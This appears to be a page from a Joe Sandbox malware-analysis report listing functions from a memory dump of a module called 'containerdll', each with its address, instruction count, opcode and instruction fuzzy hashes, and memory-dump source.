Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54764e7cd05ba6cfd6d6d14f5ec27568f214c13fe11813de3843c7b921221105
Instruction ID: 33066d0ed112a401214ccc3185894c4a1c1547f1bd1dd6a3ca64301968424d47
Opcode Fuzzy Hash: 54764e7cd05ba6cfd6d6d14f5ec27568f214c13fe11813de3843c7b921221105
Instruction Fuzzy Hash: 91710670D09A2D8FEBA4EB68C8557EDB7B1FB58340F5041BAC00EE3282DF3469958B54

Function 00007FF848F31D2D Relevance: .2, Instructions: 186COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27c093864f13a85ef2845790eb859d7c2e41ca9fecc843cdd529a449826763e5
Instruction ID: a9843b0c3ffe2190da301f9f06f085ed65d49a85a506b91b47daf5f1cb1f8377
Opcode Fuzzy Hash: 27c093864f13a85ef2845790eb859d7c2e41ca9fecc843cdd529a449826763e5
Instruction Fuzzy Hash: 0151B131A0CA9A8FDB48EF1888545BA77E2FF98340F14457EE44AC7285CF34E842C785

Function 00007FF848F3AB28 Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d3c4db085b347dd2c526c0fc1752a124dede842daebad4e5a5763a6a4f7cf75
Instruction ID: af322002d44aaea86da7e3256f94f6b5830271f19c9be95049e85e77e35e53ef
Opcode Fuzzy Hash: 7d3c4db085b347dd2c526c0fc1752a124dede842daebad4e5a5763a6a4f7cf75
Instruction Fuzzy Hash: 1E51E570E1CA5D8EEB54FBA8C4556BDB7B1FF58340F50113AD409E7282DF34A8848B84

Function 00007FF848F33155 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92c0ca6433d09d1793cf2a05e70ed193bfdee57e8c4086e3e9d258c8d9ab5e20
Instruction ID: fd8135b29b7f00a3e32f91161efb296082e86744db1b851ada2c311837c571ab
Opcode Fuzzy Hash: 92c0ca6433d09d1793cf2a05e70ed193bfdee57e8c4086e3e9d258c8d9ab5e20
Instruction Fuzzy Hash: 2C510470D0951E8FEB54EBA8E8596EDBBB1EF49341F40017AD409E72D2DB38A944CB24

Function 00007FF848F3C6FB Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8dcba607f8458df26afc7d427a34620b61683211f4a239523e5f258e16fe7d4
Instruction ID: e6812313b6d3327d8f8373810202c3db1e7d545541187d67e484db4ee2698bab
Opcode Fuzzy Hash: b8dcba607f8458df26afc7d427a34620b61683211f4a239523e5f258e16fe7d4
Instruction Fuzzy Hash: 5241B132D1D65A9FEB81BBB8A4151FE77A0FF153A5F040277D80DCA0D2EF2864908758

Function 00007FF848F32145 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f04dffdc93dd24d9bc4fbd965913b258eebdf7228efc33ea7ceebb83125cba5
Instruction ID: 2117abdff191390f4449d9c501b7fa27519156bf4cf37632bb2d5d1433c1d0da
Opcode Fuzzy Hash: 6f04dffdc93dd24d9bc4fbd965913b258eebdf7228efc33ea7ceebb83125cba5
Instruction Fuzzy Hash: 68414531E1DA8A4FE346FB7898491B8BBE0EF4A381F0541BBD40DC71D2DF28A8418365

Function 00007FF848F3C024 Relevance: .1, Instructions: 105COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8393b776968b9133bfe62cf125b33dfdb8bf5fc428c1490ef35f103b7439d18
Instruction ID: dedb250e6d08933d2a41a06a80d565c2cc81c9783b032c35992d5330c4044d4f
Opcode Fuzzy Hash: b8393b776968b9133bfe62cf125b33dfdb8bf5fc428c1490ef35f103b7439d18
Instruction Fuzzy Hash: DD31E770E1C95D9EEB94FBA8D855ABCB7B2FF58340F50503AC40DE3282DF24A8819B44

Function 00007FF848F3C208 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0c50860262a822678235084e015635df8de7d0a21a030ad083765894680a6ae
Instruction ID: 44ff0cf5de1ff89c68e37e246a40ed654596a20f11530602402033b3551e8889
Opcode Fuzzy Hash: f0c50860262a822678235084e015635df8de7d0a21a030ad083765894680a6ae
Instruction Fuzzy Hash: 4131E07084D2C95FDB06AB7448661F67FB0EF17311F0900EBD449C64D3EA29A166C361

Function 00007FF848F3C09C Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c33152edb3276d0725f6611819fcee8105b6f22e425a178d8d35e959873f923a
Instruction ID: 0bdb36254c563461d6efd6c0ab4da5d4d3e1dbb1cda82ea404ccd0854a078c24
Opcode Fuzzy Hash: c33152edb3276d0725f6611819fcee8105b6f22e425a178d8d35e959873f923a
Instruction Fuzzy Hash: C1310870E1C95D8FEB94FBA88895ABCBBB1FF59340F50112AC40DE72C2DF2468519B44

Function 00007FF848F3C850 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e17291b968d0e50fe205a3a6979316c5a020b1b607e68a0fbc335447fea3ed93
Instruction ID: c770f9c8a6b9161ede9aab127d4d6608f7e11b53632acf77745712a8fafdad99
Opcode Fuzzy Hash: e17291b968d0e50fe205a3a6979316c5a020b1b607e68a0fbc335447fea3ed93
Instruction Fuzzy Hash: D9312830D0DA0A8EEB58EB64C4556FEB7F1FF58390F10017AD00AE72C6DF2969458B58

Function 00007FF848F3AC5D Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eda1bc8c4a7819dcb7dc84224f06086a32feba094bac08464383c03b18060ebd
Instruction ID: ef98f0b7c58140f041331b4f8b1a9731e963e1494cfb264558418a2f3d0d1e05
Opcode Fuzzy Hash: eda1bc8c4a7819dcb7dc84224f06086a32feba094bac08464383c03b18060ebd
Instruction Fuzzy Hash: 0F21BF71E0CD4A9FE785FB3998582B9BBE0FF56391F0844B7C019C60D2EF29A4868344

Function 00007FF848F33350 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ab06f7ab47964042c369081794f66c9479579129b01ce77e3b871490b40ea1a
Instruction ID: 306275356e0a6aebf6a7e372af7b83ae66d50b5b9ab63aea9c6f6b296ea03b12
Opcode Fuzzy Hash: 7ab06f7ab47964042c369081794f66c9479579129b01ce77e3b871490b40ea1a
Instruction Fuzzy Hash: 1D21B13084D68A8FE742EB78885C5E97FF0EF5B301F0844EBD449CB1A2DA38954AC761

Function 00007FF848F3C4E1 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6cd7598a5713eb54f0bc6a371a631cfcd3b4194bdf81f2f0974b02b5577cfd6
Instruction ID: 55cb618c31845cda6eb39cc4714b051a3127802a108e38910fc39671ed9b7210
Opcode Fuzzy Hash: d6cd7598a5713eb54f0bc6a371a631cfcd3b4194bdf81f2f0974b02b5577cfd6
Instruction Fuzzy Hash: 43113D70908A4E8FDB84FF68C8596BE7BE1FF68301F1405AAE419C71A1EB34A550CB40

Function 00007FF848F3C451 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d21797e3e674fc79476e01fb8950ed6c6bbdf2f1bab2f290f157e0063f8ab071
Instruction ID: 2829dd31dcf8f1d606701d31860fd3c78fe9161007b239651d9dbf433db19eaa
Opcode Fuzzy Hash: d21797e3e674fc79476e01fb8950ed6c6bbdf2f1bab2f290f157e0063f8ab071
Instruction Fuzzy Hash: F1112E70908A4D8FDB95FF68C4586B97BE0FF28341F5104ABD419C7191EB35E560CB44

Function 00007FF848F3C7B0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 172978a23f0debdd2f9f646886b44fe99eb6ddcd56d479f588f1fba27b1a2570
Instruction ID: a2ccac912411414c0fc23e3fd8ae63fcfefe27d8ae5f84876731102d0f67b3a0
Opcode Fuzzy Hash: 172978a23f0debdd2f9f646886b44fe99eb6ddcd56d479f588f1fba27b1a2570
Instruction Fuzzy Hash: 8D116A3080D68E9FEB86FB6898581BA7BB0FF19341F0405BBD809C71E2EB386950C754

Function 00007FF848F3C698 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b2a9c374914469bc890c194ef496a0d69cc08ecf74fe61ee6af118abb75df78
Instruction ID: 3e0bbf8b7c578ceb1329e4e25735a3a8dfa4c853c5b3d7fa33fca901fa9229d4
Opcode Fuzzy Hash: 1b2a9c374914469bc890c194ef496a0d69cc08ecf74fe61ee6af118abb75df78
Instruction Fuzzy Hash: BD11FB70918A0E8FDB48EF28C4496BEB7E1FF68345F10457AE81AD3291DB34A550CB85

Function 00007FF848F334E5 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9f62649996a455280aee6a5466b14c9df0572240748f9435e0d92bdfc47c1a
Instruction ID: f8c75c6b68c10cbd9abf6dc1df5483d5fd4916286a136421455c9a426e0932ea
Opcode Fuzzy Hash: 2d9f62649996a455280aee6a5466b14c9df0572240748f9435e0d92bdfc47c1a
Instruction Fuzzy Hash: EA11397090868E8FDB89EF68C8596BA7BA0FF18301F0409BAD41AC61D2DB35A540C704

Function 00007FF848F3BA85 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0c1237c78528fa9dd6a20ea69caafd2c55ec08339ec002020a51e04f6b6914d2
Instruction ID: 189dc0eafbea90077d6c6a154d76d14873786151469954104ef8c92164a59df5
Opcode Fuzzy Hash: 0c1237c78528fa9dd6a20ea69caafd2c55ec08339ec002020a51e04f6b6914d2
Instruction Fuzzy Hash: 0B113970918A4E8FEB95FF6888692BABBE0FF18341F0404BBD80AC6191EB35A550C704

Function 00007FF848F32E61 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 363b79bd6b97d452ee2af7df337a6ab2f85bda0d6df69de3ced00e54a82ce468
Instruction ID: 46729d5223554c0bd981ae4357964a1022507cc6b933d757906cfc9921d209fc
Opcode Fuzzy Hash: 363b79bd6b97d452ee2af7df337a6ab2f85bda0d6df69de3ced00e54a82ce468
Instruction Fuzzy Hash: 86017831D0D68E9FE751FB68884A6A97BE0EF59342F0508B7D80CC61E2EB38E4848704

Function 00007FF848F3C685 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5203ac752534b0a4198a5c2510257ae56b2946393f809ac7831e92a6b71b7bea
Instruction ID: 2063d1f68681c67cd3698cf3e6f7c4490e2ddd8f04dd88158d3e963404fdc9ee
Opcode Fuzzy Hash: 5203ac752534b0a4198a5c2510257ae56b2946393f809ac7831e92a6b71b7bea
Instruction Fuzzy Hash: 3C113C3090890E9FDB98FF68C8496BEB7E0FF58345F1005BAD81AD2195DB30A190CB45

Function 00007FF848F3C670 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60f1278915585c64a0ad5e7374d5e25ca709f8f2b429e2b7b6a076203a4fffd2
Instruction ID: b94745c3ce2df9334ccc0249799f69747fa6fb84b3fa678984eaa15ca8058d18
Opcode Fuzzy Hash: 60f1278915585c64a0ad5e7374d5e25ca709f8f2b429e2b7b6a076203a4fffd2
Instruction Fuzzy Hash: 7B11DB3091890D9FDB84FF68C458ABABBE0FF28345F5005BAE81AD7191DB34A550CB44

Function 00007FF848F305D8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c4882ec0525b3e7df54d59ddf4cadaeab5a3c5128969bfb7ac6c370e9139012
Instruction ID: aa2eab45af054f73055000d7dc97be5733e3fb122e6714e01d018da07946b569
Opcode Fuzzy Hash: 7c4882ec0525b3e7df54d59ddf4cadaeab5a3c5128969bfb7ac6c370e9139012
Instruction Fuzzy Hash: C0019E3090890E8FEB48EF64C4596BAB7A1FF58386F50447EE40EC22C0CB31A590CB44

Function 00007FF848F3C6B8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f296e6641b1a46c5af1f806a88190754d6256eb468dbbb89983bc567fd7493e0
Instruction ID: c16adb36e952f75494eae75ec52abe0693597a44e0636bb352f8da5c01de92fd
Opcode Fuzzy Hash: f296e6641b1a46c5af1f806a88190754d6256eb468dbbb89983bc567fd7493e0
Instruction Fuzzy Hash: 18014830918A0E9EEB88FF64C4482BAB7A0FF18305F10087AE81ED2191DB35A550CB54

Function 00007FF848F3ABF8 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fbdcba36b1d6455e811a86febd5afe1dbed1165a86bfb94943462fba38d5d09
Instruction ID: 59d711437df2d84590c3f433404f617147f50b9e305506b98278c2ad352e1bba
Opcode Fuzzy Hash: 4fbdcba36b1d6455e811a86febd5afe1dbed1165a86bfb94943462fba38d5d09
Instruction Fuzzy Hash: 9E01083092890E9EEB94EBA484696BAB6A0FF18345F10187BD41ED61D1DB35A550CB04

Function 00007FF848F3283D Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b741be51f62fef20ea411baf8fe892ff7a78046617cde3829d9a27a926b3cf35
Instruction ID: 1c4ccfaa58656c3748b478608dcde3c08716ff8e4a1c22d7bf0b30d9f64bd852
Opcode Fuzzy Hash: b741be51f62fef20ea411baf8fe892ff7a78046617cde3829d9a27a926b3cf35
Instruction Fuzzy Hash: 4C018B3085D64E9FE795FB6884886B97BE0FF59342F5504B7D408C70A2EB38E0408704

Function 00007FF848F32ED9 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b28fab4a3a26aeeeda26ba0245e8d9602455b22ac0e6efa955d43f12d73fd3cb
Instruction ID: 0aab06960ecf77e6019811eed53df505c651e1856fc102b1245d61f21c80c88a
Opcode Fuzzy Hash: b28fab4a3a26aeeeda26ba0245e8d9602455b22ac0e6efa955d43f12d73fd3cb
Instruction Fuzzy Hash: 8E018F31D1D6898FE742BB7488592A97FE0EF5A342F0604F7D808CB0E6EB38A4448711

Function 00007FF848F3A819 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3423152bd45dc23225faa1e4c2971f7df57920d192905e3e2a2a820bdac3e7a6
Instruction ID: 419f613e7f5aba6a48c65c03bdf4d5574ab07fbacb87bfde52504e2d986f0ef8
Opcode Fuzzy Hash: 3423152bd45dc23225faa1e4c2971f7df57920d192905e3e2a2a820bdac3e7a6
Instruction Fuzzy Hash: 4F01783084EB895FE752BB2498591A97BE0EF5A340F1608B7D408CB0A2EB28A484C701

Function 00007FF848F31CAD Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ec885cbed01331ad43d9e01fc2aeb00af2f2b8f97328c1c9a5a0b0e07f25514
Instruction ID: 62f1e554b909a9cda948264f822e6a866c4baf550f1094d114af8428cc7baa95
Opcode Fuzzy Hash: 8ec885cbed01331ad43d9e01fc2aeb00af2f2b8f97328c1c9a5a0b0e07f25514
Instruction Fuzzy Hash: 2101FF3080D68E8FEB99EF2488592FA7BA0FF55341F4000BEE808C22C2DB35D490C744

Function 00007FF848F3D375 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd6fd9b51a965746a3be69c60ca773e98f89f949a079f6d5a0d2823b461490b7
Instruction ID: eef6b85a2aaa9f4139aa40f0adaf9de0407e3439ba826aa4243b8b7cbb5c5e04
Opcode Fuzzy Hash: dd6fd9b51a965746a3be69c60ca773e98f89f949a079f6d5a0d2823b461490b7
Instruction Fuzzy Hash: F1F08C70D0D68E8FEB94FF6488192FA7BA0FF14341F40047AE818C2192EB34A950CB80

Function 00007FF848F30608 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19a461c14cebaff5d3232232b8cdcb15d8d7245381779a7653970bb1b0591a62
Instruction ID: e99e20a613dc8426e70129a5c3a52498749959ddaa4778b58202b305723cb82c
Opcode Fuzzy Hash: 19a461c14cebaff5d3232232b8cdcb15d8d7245381779a7653970bb1b0591a62
Instruction Fuzzy Hash: EA01693091860E9EEB59FFA884586BE76A1FF18346F50087EE40EC61D1EF35A190C604

Function 00007FF848F30610 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1db56f3b835dfe49ad004c91ae9d5e1c76fa6e19d62e05b2115ed274a555019
Instruction ID: d03e00fe451eb5642abc3ce5f6623f7478fac096096f1766979655766ccf2dd0
Opcode Fuzzy Hash: e1db56f3b835dfe49ad004c91ae9d5e1c76fa6e19d62e05b2115ed274a555019
Instruction Fuzzy Hash: 35016930919A0E9EEB59FB6484592B9B6E0FF18346F20487FE40EC21D1DF39A550C614

Function 00007FF848F571A0 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3583d193f5e3bb2eccddcabc4d00fcae27b21b2cfdb914211c4e8114fc9a63bb
Instruction ID: 06a2d160b5ebd38fad1a627d60c1814a4025fd935c7a2c1c3c100cdf95de8475
Opcode Fuzzy Hash: 3583d193f5e3bb2eccddcabc4d00fcae27b21b2cfdb914211c4e8114fc9a63bb
Instruction Fuzzy Hash: 18013C3091890E9EEB81FB78884C6BAB7E4FF18341F1049B6E81DC3092EF34A1948B44

Function 00007FF848F3C500 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6f0d7fd6028b662c3495c58f8377aafa744a4b04ea89ee42ea0179afb4b7c27
Instruction ID: 96105aebb6549b1835acdae08aeb06ebf1deda2f95ce1cef42ebae5dc5499c65
Opcode Fuzzy Hash: d6f0d7fd6028b662c3495c58f8377aafa744a4b04ea89ee42ea0179afb4b7c27
Instruction Fuzzy Hash: A5016674918A4E8FEF94EF58C849AAA77E4FF68345F00056AA819C3191EB70E560CB81

Function 00007FF848F38888 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4419cadfe5e78c60a04b8abfd16324ba685b78cc88df49cd2ec245cfd835cc59
Instruction ID: 4133968b90b385bf65f79218767baed1e5d7c4172f6123d9c683a00cfc3e94a0
Opcode Fuzzy Hash: 4419cadfe5e78c60a04b8abfd16324ba685b78cc88df49cd2ec245cfd835cc59
Instruction Fuzzy Hash: BB11FA70D0822A9FDB65DF14C8407A9B7F5BB54340F2481E6C00DA6291DF34AF85DF40

Function 00007FF848F305D0 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15d8feff42f1c9093e4f22f411b5516105d847f12d32f1fea528f2b2b311d9d4
Instruction ID: 6c1773de4df031a049bb746555071ee6d070705278b5cc1f806c81fc3f4089e0
Opcode Fuzzy Hash: 15d8feff42f1c9093e4f22f411b5516105d847f12d32f1fea528f2b2b311d9d4
Instruction Fuzzy Hash: E5F06D3081E64E8FEB95EF6494152FA77A4FF15389F50457AF80DC22C1DB39A5A0CB88

Function 00007FF848F32759 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f89ea5aa8f19f1f4b68d1e1ddcd84d4eff4208d31251f1f83d4cdc5938ca6ae
Instruction ID: 27cdfefb2d28d74907dbc0ab21325ccc7f9008d7d64202602453ef763a79e55b
Opcode Fuzzy Hash: 0f89ea5aa8f19f1f4b68d1e1ddcd84d4eff4208d31251f1f83d4cdc5938ca6ae
Instruction Fuzzy Hash: 8FF0623180E78A8FEB5AAF6488591A93BA1FF16341F4504BBD449C61D2EB38A454C741

Function 00007FF848F3BF0A Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2217190133.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff848f30000_containerdll.jbxd

Similarity

API ID:
String ID:
API String ID:
